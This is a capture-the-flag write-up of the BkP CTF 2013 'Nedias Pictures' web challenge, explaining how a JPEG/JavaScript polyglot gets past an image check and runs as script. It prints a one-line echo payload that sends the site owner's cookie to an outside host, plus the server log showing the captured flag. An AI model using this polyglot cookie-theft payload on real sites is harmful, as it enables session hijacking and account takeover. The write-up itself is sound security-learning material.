June 09, 2013

Write-up: BkP CTF 2013 Nedias Pictures


Introduction

This is a web challenge. There is an XSS flaw in the website and one needs to steal the cookie from the website owner because it has the flag in it. The owner accesses the site everytime a new picture is sent :)

In the website we are able to upload a picture and select if this picture will be presented using the <img> tag or the <script> tag by chaging the value of the “tag” POST variable.

The website is validating if the image sent is really an image (it will check the image data to make sure that the file being uploaded is not a script or something).

Nedia's Pictures

Solution

So, what we need to do is to bypass the checking for the image that is made on the server side and have this image to be interpreted.

After searching around a little bit the different file formats, the JPG format called my attention. A “valid” JPG file needs only two bytes: \xFF\xD8, which will pass the filter as it will be interpreted as a JPEG file AND is also valid javascript code (now you have a variable with that name).

Very cool, so with this I have created the following payload:

echo -en "\xff\xd8\xff\xf8=1;img=new Image();img.src='http://www.gilgalab.com.br/?cookie='+document.cookie;" > xpto2.jpg

The \xFF\xF8 indicates that we are starting a comment section in the JPEG file, and is also valid javascript!

After that all I had to do was to upload the image and set the “tag” field to “script” and check the apache logs!

54.218.11.211 - - [09/Jun/2013:00:43:27 +0000] "GET /?cookie=flag=didnt_need_script_tags_on_ie6 HTTP/1.1" 200 2476 "http://localhost/gallery/63330c986a4daffe2c4cec548945de1b5ee456c2/upload.php" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:21.0) Gecko/20100101 Firefox/21.0"

So the flag is flag=didnt_need_script_tags_on_ie6

Nice challenge :)